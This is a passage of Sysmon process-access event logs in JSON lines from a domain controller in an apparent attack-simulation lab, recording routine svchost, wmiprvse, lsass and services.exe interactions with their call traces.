07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1128,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1129,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1130,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.330\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.330","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1131,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.330\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.330","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1132,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.330\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.330","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1133,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:16.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:16.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1134,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:16.377\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nSourceProcessId: 1216\r\nSourceThreadId: 1896\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:16.377","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","SourceProcessId":"1216","SourceThreadId":"1896","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1135,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.236\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.236","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 